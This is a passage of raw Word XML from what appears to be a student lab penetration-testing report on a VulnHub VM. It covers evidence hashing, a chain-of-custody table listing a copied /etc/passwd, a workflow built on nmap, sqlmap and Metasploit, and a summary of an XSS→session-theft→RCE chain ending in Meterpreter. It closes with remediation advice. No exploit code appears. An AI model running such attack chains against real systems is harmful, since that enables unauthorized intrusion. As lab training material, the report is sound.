          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>If a known local exploit is available in lab, document exact module used, version, and relevant output.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43AF6D55" w14:textId="77777777" w:rsidR="009B72D7" w:rsidRPr="009B72D7" w:rsidRDefault="009B72D7" w:rsidP="009B72D7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Evidence collection (hash files, capture traffic):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02D67455" w14:textId="7839801F" w:rsidR="004B0A4F" w:rsidRPr="004B0A4F" w:rsidRDefault="009B72D7" w:rsidP="004B0A4F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
          <w:iCs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Capture traffic with Wireshark on Kali (promiscuous on lab network) and </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009B72D7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>save .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pcap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009B72D7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6329FEB" w14:textId="77777777" w:rsidR="004B0A4F" w:rsidRDefault="004B0A4F" w:rsidP="004B0A4F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="299FE7DC" w14:textId="0FCB3C56" w:rsidR="004B0A4F" w:rsidRPr="004B0A4F" w:rsidRDefault="004B0A4F" w:rsidP="004B0A4F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B0A4F">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="44F94384" wp14:editId="727ABB8B">
            <wp:extent cx="5733415" cy="2724150"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="189177365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23C02" w14:textId="768EB2A4" w:rsidR="009B72D7" w:rsidRPr="009B72D7" w:rsidRDefault="009B72D7" w:rsidP="004B0A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CC4E24F" w14:textId="77777777" w:rsidR="009B72D7" w:rsidRPr="009B72D7" w:rsidRDefault="009B72D7" w:rsidP="009B72D7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1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Hash collected files:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="682AB269" w14:textId="77777777" w:rsidR="009B72D7" w:rsidRPr="009B72D7" w:rsidRDefault="009B72D7" w:rsidP="009B72D7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="1440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sha256sum /path/to/artifact &gt; /evidence/</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009B72D7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>artifact.sha</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009B72D7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>256</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="490B4B73" w14:textId="77777777" w:rsidR="009B72D7" w:rsidRPr="009B72D7" w:rsidRDefault="009B72D7" w:rsidP="009B72D7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1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Record metadata in Chain of Custody log (table below).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="515A446E" w14:textId="77777777" w:rsidR="009B72D7" w:rsidRPr="009B72D7" w:rsidRDefault="009B72D7" w:rsidP="009B72D7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0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Volatility memory capture (if needed):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F001F02" w14:textId="77777777" w:rsidR="009B72D7" w:rsidRPr="009B72D7" w:rsidRDefault="009B72D7" w:rsidP="009B72D7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5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Dump memory image (lab approach dependent). Then run Volatility to extract processes and network artifacts. Document commands and outputs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12B24A8C" w14:textId="2A58301A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CE2A6E3" w14:textId="456D7FE1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Chain-of-Custody  </w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="GridTable6Colorful"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="844"/>
        <w:gridCol w:w="1270"/>
        <w:gridCol w:w="1082"/>
        <w:gridCol w:w="743"/>
        <w:gridCol w:w="1264"/>
        <w:gridCol w:w="3816"/>
      </w:tblGrid>
      <w:tr w:rsidR="00DB254B" w:rsidRPr="009B72D7" w14:paraId="22C08F0E" w14:textId="77777777" w:rsidTr="005825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93DFC" w14:textId="77777777" w:rsidR="009B72D7" w:rsidRPr="009B72D7" w:rsidRDefault="009B72D7" w:rsidP="009B72D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Item</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0F3BDF7D" w14:textId="77777777" w:rsidR="009B72D7" w:rsidRPr="009B72D7" w:rsidRDefault="009B72D7" w:rsidP="009B72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Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="06F98A77" w14:textId="77777777" w:rsidR="009B72D7" w:rsidRPr="009B72D7" w:rsidRDefault="009B72D7" w:rsidP="009B72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Collected By</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2E41B8B8" w14:textId="77777777" w:rsidR="009B72D7" w:rsidRPr="009B72D7" w:rsidRDefault="009B72D7" w:rsidP="009B72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Date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2A583B3E" w14:textId="77777777" w:rsidR="009B72D7" w:rsidRPr="009B72D7" w:rsidRDefault="009B72D7" w:rsidP="009B72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Hash Value</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="15E58F8B" w14:textId="77777777" w:rsidR="009B72D7" w:rsidRPr="009B72D7" w:rsidRDefault="009B72D7" w:rsidP="009B72D7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Storage Path</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DB254B" w:rsidRPr="009B72D7" w14:paraId="0B96224D" w14:textId="77777777" w:rsidTr="0058251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3CD178" w14:textId="77777777" w:rsidR="009B72D7" w:rsidRPr="009B72D7" w:rsidRDefault="009B72D7" w:rsidP="009B72D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Traffic Log</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="483CCA13" w14:textId="77777777" w:rsidR="009B72D7" w:rsidRPr="009B72D7" w:rsidRDefault="009B72D7" w:rsidP="009B72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HTTP Traffic </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/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pcap</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5F2120CE" w14:textId="77777777" w:rsidR="009B72D7" w:rsidRPr="009B72D7" w:rsidRDefault="009B72D7" w:rsidP="009B72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VAPT Analyst</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="14F459E0" w14:textId="08D1242E" w:rsidR="009B72D7" w:rsidRPr="009B72D7" w:rsidRDefault="009B72D7" w:rsidP="009B72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2025</w:t>
            </w:r>
            <w:r w:rsid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-10-18</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7D28B472" w14:textId="77777777" w:rsidR="009B72D7" w:rsidRPr="009B72D7" w:rsidRDefault="009B72D7" w:rsidP="009B72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e3b0c442...</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1D9F83F5" w14:textId="77777777" w:rsidR="009B72D7" w:rsidRPr="009B72D7" w:rsidRDefault="009B72D7" w:rsidP="009B72D7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/evidence/traffic_198.168.178.150.pcap</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DB254B" w:rsidRPr="009B72D7" w14:paraId="75051DD0" w14:textId="77777777" w:rsidTr="0058251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EA4B7" w14:textId="77777777" w:rsidR="009B72D7" w:rsidRPr="009B72D7" w:rsidRDefault="009B72D7" w:rsidP="009B72D7">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both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File Dump</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5BF1B18F" w14:textId="77777777" w:rsidR="009B72D7" w:rsidRPr="009B72D7" w:rsidRDefault="009B72D7" w:rsidP="009B72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/etc/passwd copy</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="623593D0" w14:textId="77777777" w:rsidR="009B72D7" w:rsidRPr="009B72D7" w:rsidRDefault="009B72D7" w:rsidP="009B72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VAPT Analyst</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3C747CBD" w14:textId="24CCE4EA" w:rsidR="009B72D7" w:rsidRPr="009B72D7" w:rsidRDefault="009B72D7" w:rsidP="009B72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2025-</w:t>
            </w:r>
            <w:r w:rsid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10</w:t>
            </w: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-</w:t>
            </w:r>
            <w:r w:rsidR="00DB25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18</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5BE220E5" w14:textId="77777777" w:rsidR="009B72D7" w:rsidRPr="009B72D7" w:rsidRDefault="009B72D7" w:rsidP="009B72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9c56f...</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0D14E0EA" w14:textId="77777777" w:rsidR="009B72D7" w:rsidRPr="009B72D7" w:rsidRDefault="009B72D7" w:rsidP="009B72D7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B72D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/evidence/etc_passwd.txt</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6055A63A" w14:textId="143A3189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0D6EE0A" w14:textId="5A65ABBC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b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6076CFD8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Collected network and host artifacts after successful exploitation of 198.168.178.150. Captured packet trace (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pcap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>), dumped relevant files, and recorded SHA-256 hashes. All evidence stored securely with chain-of-custody entries, timestamps, and collector identity to preserve integrity for further forensic or remediation work.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="491085FB" w14:textId="269981F2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9F0D955" w14:textId="6BBAFCCE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IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B72D7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Capstone Project: Full VAPT Cycle</w:t>
      </w:r>
      <w:r w:rsidRPr="009B72D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14:paraId="47CE61FA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Brief</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53919454" w14:textId="77777777" w:rsidR="009B72D7" w:rsidRPr="009B72D7" w:rsidRDefault="009B72D7" w:rsidP="009B72D7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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Simulate a full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pentest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against a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VulnHub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VM (example 198.168.178.150). Tools: Kali (198.168.178.133), Metasploit (198.168.178.129), OpenVAS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12F4328F" w14:textId="7F8148F1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D445BD6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Step-by-Step Workflow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0283E9F4" w14:textId="77777777" w:rsidR="009B72D7" w:rsidRPr="009B72D7" w:rsidRDefault="009B72D7" w:rsidP="009B72D7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Scope &amp; Rules of Engagement — Document allowed targets and unacceptable actions. Place in report header.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19B2D484" w14:textId="6D06EE04" w:rsidR="009B72D7" w:rsidRDefault="009B72D7" w:rsidP="009B72D7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Reconnaissance —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nmap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gobuster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nikto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>. Log outputs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A729A21" w14:textId="72C1EEF1" w:rsidR="00121BEC" w:rsidRPr="009B72D7" w:rsidRDefault="00121BEC" w:rsidP="00121BE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35072019" wp14:editId="3C8DCA5F">
            <wp:extent cx="5733415" cy="2840182"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="1460928955" name="Picture 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928955" name="Picture 6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5858" cy="284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F7922" w14:textId="77777777" w:rsidR="009B72D7" w:rsidRPr="009B72D7" w:rsidRDefault="009B72D7" w:rsidP="009B72D7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Vulnerability Scanning — Run OpenVAS from Kali/VM, save report.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27271280" w14:textId="11163F82" w:rsidR="009B72D7" w:rsidRPr="009B72D7" w:rsidRDefault="009B72D7" w:rsidP="009B72D7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1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Example: run OpenVAS scan and export CSV/PDF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20FD89CD" w14:textId="77777777" w:rsidR="009B72D7" w:rsidRPr="009B72D7" w:rsidRDefault="009B72D7" w:rsidP="009B72D7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Manual Verification — Confirm critical results manually (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sqlmap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>, Burp).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="399C3405" w14:textId="1D8F1A65" w:rsidR="009B72D7" w:rsidRPr="009B72D7" w:rsidRDefault="009B72D7" w:rsidP="009B72D7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Exploitation — Use Metasploit modules or manual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PoCs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to gain access. Save all commands and outputs. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="388486A6" w14:textId="54B35F99" w:rsidR="009B72D7" w:rsidRPr="009B72D7" w:rsidRDefault="009B72D7" w:rsidP="009B72D7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Post-Exploit — Privilege escalation, evidence collection, maintain chain-of-custody. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F2E582F" w14:textId="77777777" w:rsidR="009B72D7" w:rsidRPr="009B72D7" w:rsidRDefault="009B72D7" w:rsidP="009B72D7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Remediation &amp; Re-scan — Suggest patches, fix config, re-run scans to verify remediation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C730C3F" w14:textId="59084ED1" w:rsidR="004B0A4F" w:rsidRPr="009B72D7" w:rsidRDefault="009B72D7" w:rsidP="004B0A4F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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Reporting — Produce PTES-style report (200 words below), findings tables, non-technical briefing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E6D5643" w14:textId="24A9A9A6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29FE8A6" w14:textId="77777777" w:rsidR="004B0A4F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b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Executive Summary</w:t>
      </w:r>
      <w:r w:rsidRPr="009B72D7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03932BC6" w14:textId="4847D91C" w:rsidR="009B72D7" w:rsidRPr="009B72D7" w:rsidRDefault="009B72D7" w:rsidP="004B0A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During an authorized penetration test of the lab web environment (target 198.168.178.150), we executed reconnaissance, automated scanning, and manual verification to identify exploitable vulnerabilities. The highest risk finding was a critical SQL injection in the login endpoint, enabling unauthorized database access. We chained a reflected XSS to session theft and leveraged a server-side RCE to obtain a Meterpreter session, demonstrating the impact of insufficient input validation</w:t>
      </w:r>
      <w:r w:rsidR="004B0A4F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9B72D7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>and weak session controls.</w:t>
      </w:r>
      <w:r w:rsidRPr="009B72D7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">Findings: Detailed findings include F001 (SQL Injection, CVSS 9.1), F002 (Reflected XSS, CVSS 6.1), and F003 (RCE, CVSS 9.8). Each finding contains reproducible steps, evidence </w:t>
      </w:r>
      <w:r w:rsidRPr="009B72D7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>screenshots, and CVS</w:t>
      </w:r>
      <w:r w:rsidR="00121BEC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">S </w:t>
      </w:r>
      <w:r w:rsidRPr="009B72D7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>scoring.</w:t>
      </w:r>
      <w:r w:rsidRPr="009B72D7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:br/>
        <w:t>Recommendations: Immediate remediation actions: (1) implement parameterized database queries and least-privilege DB accounts, (2) apply output encoding plus Content Security Policy, (3) update and patch web components and frameworks, (4) enforce secure session management and rotate compromised credentials. After fixes, a re-scan and manual verification are required. We are available to assist with prioritized remediation and verification scans.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E1D4AFF" w14:textId="43F27668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4D2F074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Appendices &amp; Deliverables (what to include in your Google Doc)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B5F677C" w14:textId="77777777" w:rsidR="009B72D7" w:rsidRPr="009B72D7" w:rsidRDefault="009B72D7" w:rsidP="009B72D7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Title page (scope, dates, IP list: Kali 198.168.178.133, Metasploit 198.168.178.129, Targets).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5611D59D" w14:textId="77777777" w:rsidR="009B72D7" w:rsidRPr="009B72D7" w:rsidRDefault="009B72D7" w:rsidP="009B72D7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Network diagram (Draw.io placeholder). </w:t>
      </w:r>
      <w:r w:rsidRPr="009B72D7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>[SPACE: Insert Draw.io attack path diagram]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="053CD283" w14:textId="77777777" w:rsidR="009B72D7" w:rsidRPr="009B72D7" w:rsidRDefault="009B72D7" w:rsidP="009B72D7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Full command logs (appendix) — copy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nmap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sqlmap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msfconsole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transcripts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0964A357" w14:textId="77777777" w:rsidR="009B72D7" w:rsidRPr="009B72D7" w:rsidRDefault="009B72D7" w:rsidP="009B72D7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PoC scripts (redacted) and the 50-word PoC modification summary.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74DAF979" w14:textId="77777777" w:rsidR="009B72D7" w:rsidRPr="009B72D7" w:rsidRDefault="009B72D7" w:rsidP="009B72D7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All screenshots with captions and timestamps.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43EFB65A" w14:textId="0AF05BF0" w:rsidR="009B72D7" w:rsidRDefault="009B72D7" w:rsidP="009B72D7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Chain-of-Custody table and evidence hashes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23108AC7" w14:textId="77777777" w:rsidR="004B0A4F" w:rsidRPr="009B72D7" w:rsidRDefault="004B0A4F" w:rsidP="009B72D7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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E336D31" w14:textId="131ECB0A" w:rsid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Exploit Log </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="065E80AA" w14:textId="77777777" w:rsidR="004B0A4F" w:rsidRPr="009B72D7" w:rsidRDefault="004B0A4F" w:rsidP="009B72D7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5F0CA1D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| Exploit ID | Description         | Target IP        | </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009B72D7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Status  |</w:t>
      </w:r>
      <w:proofErr w:type="gram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Payload     | Notes |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3186A828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|------------|---------------------|------------------:|---------|-------------|-------|</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15EDD67C" w14:textId="3E1FF61F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| 004        |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XSS→Session→RCE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    | </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009B72D7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>198.168.178.150  |</w:t>
      </w:r>
      <w:proofErr w:type="gram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Success | Meterpreter|</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6049FF41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Test Log (markdown)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11D240E6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| Test ID | Vulnerability   | </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009B72D7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Severity  |</w:t>
      </w:r>
      <w:proofErr w:type="gram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Target URL                       | Evidence |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A107AB1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|---------|-----------------|-----------|----------------------------------|----------|</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="753FA88C" w14:textId="006758BD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| 001     | SQL Injection   | </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009B72D7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Critical  |</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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 http://198.168.178.150/login.php </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2631F14E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Evidence Log (markdown)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65030D48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| Item        | Description      | Collected By | Date       | Hash Value | Storage Path |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41217C17" w14:textId="77777777" w:rsidR="009B72D7" w:rsidRPr="009B72D7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>|-------------|------------------|--------------|------------|------------|--------------|</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="343B65F0" w14:textId="4909CB3E" w:rsidR="00C776D2" w:rsidRDefault="009B72D7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9B72D7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">| Traffic Log | HTTP Traffic </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009B72D7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>pcap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009B72D7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>| Analyst Name | 2025-08-25 | &lt;SHA256&gt;   | /evidence/...|</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72BEC6DF" w14:textId="77777777" w:rsidR="004B0A4F" w:rsidRDefault="004B0A4F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EF51CF0" w14:textId="77777777" w:rsidR="004B0A4F" w:rsidRDefault="004B0A4F" w:rsidP="004B0A4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876E296" w14:textId="0ED6512E" w:rsidR="004B0A4F" w:rsidRPr="004B0A4F" w:rsidRDefault="004B0A4F" w:rsidP="004B0A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B0A4F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Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73DF6171" w14:textId="77777777" w:rsidR="004B0A4F" w:rsidRPr="004B0A4F" w:rsidRDefault="004B0A4F" w:rsidP="004B0A4F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B0A4F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Lab validated a full VAPT cycle: recon, web-path discovery, verification (SQLi, XSS), exploit chaining (XSS → session theft → RCE), post-exploit (Meterpreter), evidence collection, and reporting.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BAA1ACB" w14:textId="77777777" w:rsidR="004B0A4F" w:rsidRPr="004B0A4F" w:rsidRDefault="004B0A4F" w:rsidP="004B0A4F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B0A4F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Root causes: missing input validation/parameterized queries, poor output encoding, weak session controls, and unpatched components.</w:t>
      </w:r>
    </w:p>
